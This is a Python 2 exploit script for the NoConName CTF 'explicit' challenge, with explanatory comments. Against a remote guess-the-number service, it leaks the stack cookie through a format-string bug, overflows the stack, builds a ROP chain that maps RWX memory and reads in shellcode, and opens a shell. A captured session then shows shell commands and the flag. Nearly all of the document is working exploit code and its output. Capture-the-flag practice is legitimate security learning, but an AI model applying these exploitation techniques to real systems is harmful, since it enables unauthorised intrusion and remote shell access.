#!/usr/bin/env python
import struct, sys, time  # struct and sys are imported but not referenced below
from nulllife import *
#
#NoConName CTF
#explitcit exploit 500pts
#
# Exploit script for the "explicit" challenge ("Guess The Number Online", see
# the transcript string at the bottom of the file). Everything it relies on is
# visible in the code below:
#   1. a format-string bug in the guess prompt, used to leak the stack cookie
#      ("%70$08X") so that the later overflow can pass the cookie check;
#   2. a stack overflow through the guess input, overwriting the cookie and the
#      saved return address at fixed offsets (0x100 / 0x110 into the payload);
#   3. a ROP chain made of fixed addresses in the binary (which implies the
#      binary is loaded at a fixed address, i.e. no PIE -- inferred) that
#      mmap2()s an RWX region, read()s the shellcode from the socket into it
#      and returns into it.
# NullSocket / NullShell / pack come from the nulllife helper library via the
# star import; pack is assumed to emit one 32-bit little-endian dword (the chain
# only makes sense for 32-bit x86, cf. the "add esp 0x1C" gadget) -- confirm.
# Python 2 code: print statements and str-as-bytes (.encode('hex')).
s = NullSocket("88.87.208.163", 7070)
print s.readuntil("20: ")
# Stage 1 -- cookie leak: the 70th stack argument is printed as 8 zero-padded
# hex digits right after "is "; read exactly those 8 chars and parse them.
s.writeline("%70$08X")
s.readuntil("is ")
#cookie = 0xC0951F00  # stale value from an earlier run (presumably); the cookie is leaked live below instead
cookie = int(s.read(8), 16)
s.readuntil("20: ")
# Stage 2 -- layout of the overflowing input: offsets, from the start of the
# payload, of the stack cookie and of the saved return address.
padding_cookie = 0x100
padding_ret = 0x110
fd = 4  # assumed to be the client socket's descriptor inside the target process (dup2 target and read() source below) -- confirm
# Fixed addresses inside the target binary (syscall stubs, presumably a static build).
sys_write = 0x0805EFAA  # not used by the chain below
sys_read = 0x0805EF4A
sys_mmap2 = 0x0805F960
exec_addr = 0x43440000  # address requested for the RWX mapping; the shellcode is read to, and executed from, here
pop_7_ret = 0x080494d7 #add esp 0x1C; retn -- discards the 7 dwords of mmap2 arguments + filler that follow it
# Shellcode: dup2() stdio onto the socket fd, then exec a shell (both stubs from nulllife).
shellcode = NullShell("dup2").get(fd) + NullShell("exec").get()
print "Shellcode: " + shellcode.encode('hex')
shellcode = "\x90" * 16 + shellcode  # 16-byte NOP sled in front of the shellcode
payload = "q" #finish loop -- the first byte makes the program leave its guessing loop (inferred from the original comment)
payload += "A" * (padding_cookie - len(payload))
payload += pack(cookie)  # leaked cookie goes back in place, so the cookie check passes
payload += "B" * (padding_ret - len(payload))
#call mmap2(addr, len, prot, flags, fd, offset); the stub "returns" into pop_7_ret,
#which unwinds the 7 dwords below and then returns into the read() frame
payload += pack(sys_mmap2)
payload += pack(pop_7_ret)
payload += pack(exec_addr) #address
payload += pack(0x00010000) #size (64 KiB)
payload += pack(7) #prot: PROT_READ|PROT_WRITE|PROT_EXEC
payload += pack(0x32) #flags: MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS (0x02|0x10|0x20)
payload += pack(0xFFFFFFFF) #fd: -1 (anonymous mapping)
payload += pack(0)  #offset: 0
payload += "D" * 4  # 7th dword consumed by pop_7_ret, never used
#call read(fd, exec_addr, len(shellcode)); its return address is the buffer
#itself, so control passes to the NOP sled once the shellcode bytes have arrived
payload += pack(sys_read)
payload += pack(exec_addr) #return to shellcode
payload += pack(fd) #fd
payload += pack(exec_addr)  #buf
payload += pack(len(shellcode))  #count: exactly the number of bytes sent in stage 3
print hex(len(shellcode))
print "[!] Send payload"
s.writeline(payload)
time.sleep(1)  # let the target reach the read() before the shellcode bytes arrive (timing assumption)
print "[!] Send shellcode"
s.write(shellcode)  # raw write, no trailing newline, so the byte count matches read()'s count argument
print "[*] Got shell..."
s.interactive()
'''
$ python explicit.py
Welcome to Guess The Number Online!
Pick a number between 0 and 20:
Shellcode: 31db31c9b304b1036a3f5849cd8075f831c050682f2f7368682f62696e89e3505389e189c2b00bcd80
[!] Send payload
[!] Send shellcode
[*] Got shell...
Bye
id
uid=1006(ch5) gid=1006(ch5) groups=1006(ch5)
ls -la
total 88
drwxr-xr-x 22 root root 4096 Sep 13 17:48 .
drwxr-xr-x 22 root root 4096 Sep 13 17:48 ..
drwxr-xr-x 2 root root 4096 Sep 12 17:57 bin
drwxr-xr-x 2 root root 4096 Jun 11 23:07 boot
drwxr-xr-x 3 root root 4096 Sep 12 17:40 dev
drwxr-xr-x 51 root root 4096 Sep 13 19:58 etc
drwxr-xr-x 3 root root 4096 Sep 13 18:34 home
drwxr-xr-x 11 root root 4096 Sep 12 17:40 lib
drwxr-xr-x 2 root root 4096 Sep 12 17:51 lib64
drwxr-xr-x 2 root root 4096 Sep 12 17:38 media
drwxr-xr-x 2 root root 4096 Jun 11 23:07 mnt
drwxr-xr-x 2 root root 4096 Sep 12 17:38 opt
drwxr-xr-x 2 root root 4096 Jun 11 23:07 proc
drwx------ 2 root root 4096 Sep 13 18:41 root
drwxr-xr-x 6 root root 4096 Sep 13 18:30 run
drwxr-xr-x 2 root root 4096 Sep 12 17:51 sbin
drwxr-xr-x 2 root root 4096 Jun 10 2012 selinux
drwxr-xr-x 2 root root 4096 Sep 12 17:38 srv
drwxr-xr-x 2 root root 4096 Jul 14 2013 sys
drwxrwxrwt 3 root root 4096 Sep 14 03:01 tmp
drwxr-xr-x 10 root root 4096 Sep 12 17:38 usr
drwxr-xr-x 12 root root 4096 Sep 12 17:57 var
cd /home
ls
ch5
cd ch5
ls -la
total 600
drwxr-xr-x 2 ch5 ch5 4096 Sep 14 02:50 .
drwxr-xr-x 3 root root 4096 Sep 13 18:34 ..
-rw------- 1 ch5 ch5 337 Sep 14 02:50 .bash_history
-rw-r--r-- 1 ch5 ch5 220 Dec 30 2012 .bash_logout
-rw-r--r-- 1 ch5 ch5 3392 Dec 30 2012 .bashrc
-rw-r--r-- 1 ch5 ch5 675 Dec 30 2012 .profile
-rwxr-xr-x 1 root root 583172 Sep 13 19:58 explicit
-rw-r--r-- 1 root root 45 Sep 14 01:31 flag.txt
-rw------- 1 ch5 ch5 0 Sep 13 21:31 nohup.out
cat flag.txt
NcN_97740ead1060892a253be8ca33c6364a712b21d2
exit
*** Connection closed by remote host ***
'''